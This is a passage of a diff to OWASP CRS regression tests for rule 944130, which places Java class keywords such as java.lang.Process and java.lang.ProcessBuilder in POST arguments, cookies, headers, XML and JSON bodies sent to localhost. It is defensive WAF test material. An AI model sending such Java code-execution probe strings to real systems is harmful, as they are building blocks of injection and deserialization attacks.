"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Object - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-301 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Object + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 301 desc: "Cookie name includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Object=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-302 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Object=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 302 desc: "Request header test includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Object - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-303 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Object + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 303 desc: "XML attribute value includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-304 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 304 desc: "XML element value includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Object" - output: - log_contains: "id \"944130\"" - - test_title: 944130-305 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Object" + output: + log: + expect_ids: [944130] + - test_id: 305 desc: "Nested XML element value includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Object" - output: - log_contains: "id \"944130\"" - - test_title: 944130-306 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Object" + output: + log: + expect_ids: [944130] + - test_id: 306 desc: "Content-Type text/plain includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Object" - output: - log_contains: "id \"944130\"" - - test_title: 944130-307 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Object" + output: + log: + expect_ids: [944130] + - test_id: 307 desc: "Content-Type application/json arg value includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Object\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-308 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Object\"}" + output: + log: + expect_ids: [944130] + - test_id: 308 desc: "Content-Type application/json arg name includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.Object\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-309 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Object\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 309 desc: "Argument test includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Process" - output: - log_contains: "id \"944130\"" - - test_title: 944130-310 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Process" + output: + log: + expect_ids: [944130] + - test_id: 310 desc: "Argument name includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Process=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-311 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Process=test" + output: + log: + expect_ids: [944130] + - test_id: 311 desc: "Cookie test includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Process - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-312 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Process + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 312 desc: "Cookie name includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Process=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-313 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Process=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 313 desc: "Request header test includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Process - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-314 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Process + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 314 desc: "XML attribute value includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-315 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 315 desc: "XML element value includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Process" - output: - log_contains: "id \"944130\"" - - test_title: 944130-316 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Process" + output: + log: + expect_ids: [944130] + - test_id: 316 desc: "Nested XML element value includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Process" - output: - log_contains: "id \"944130\"" - - test_title: 944130-317 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Process" + output: + log: + expect_ids: [944130] + - test_id: 317 desc: "Content-Type text/plain includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Process" - output: - log_contains: "id \"944130\"" - - test_title: 944130-318 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Process" + output: + log: + expect_ids: [944130] + - test_id: 318 desc: "Content-Type application/json arg value includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Process\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-319 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Process\"}" + output: + log: + expect_ids: [944130] + - test_id: 319 desc: "Content-Type application/json arg name includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.Process\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-320 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Process\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 320 desc: "Argument test includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-321 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.ProcessBuilder" + output: + log: + expect_ids: [944130] + - test_id: 321 desc: "Argument name includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.ProcessBuilder=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-322 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder=test" + output: + log: + expect_ids: [944130] + - test_id: 322 desc: "Cookie test includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.ProcessBuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-323 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.ProcessBuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 323 desc: "Cookie name includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.ProcessBuilder=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-324 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.ProcessBuilder=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 324 desc: "Request header test includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.ProcessBuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-325 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.ProcessBuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 325 desc: "XML attribute value includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-326 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 326 desc: "XML element value includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-327 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder" + output: + log: + expect_ids: [944130] + - test_id: 327 desc: "Nested XML element value includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-328 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder" + output: + log: + expect_ids: [944130] + - test_id: 328 desc: "Content-Type text/plain includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 